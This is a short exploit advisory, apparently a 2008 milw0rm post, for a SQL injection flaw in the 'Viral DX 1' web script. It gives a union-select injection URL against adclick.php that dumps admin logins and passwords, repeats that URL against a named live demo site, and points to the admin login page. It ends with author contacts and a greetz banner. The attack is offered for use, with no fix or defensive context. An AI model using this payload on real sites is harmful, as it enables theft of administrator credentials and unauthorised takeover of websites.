######################################################### # # Viral DX 1 SQL Injection Vulnerability #======================================================== # # Author: Hussin X # # Home : www.tryag.cc/cc # # email: darkangel_g85[at]Yahoo[DoT]com # hussin.x[at]hotmail[DoT]com # #======================================================== # HomE script : http://e-topbiz.com/ # # Demo : http://e-topbiz.com/trafficdemos/viraldx1/ # # ########################################################## Exploit: http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws (0x3a,login,pass)+from+pass-- L!VE DEMO: http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=- 1+union+select+concat_ws(0x3a,login,pass)+from+pass-- LoGiN : /admin/login.php ################################################################################ ####################################( Greetz )################################## # # # tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # # Silic0n / Rafi / FAHD / Iraqihack # # # #################################(and All IRAQIs)############################### # milw0rm.com [2008-06-24]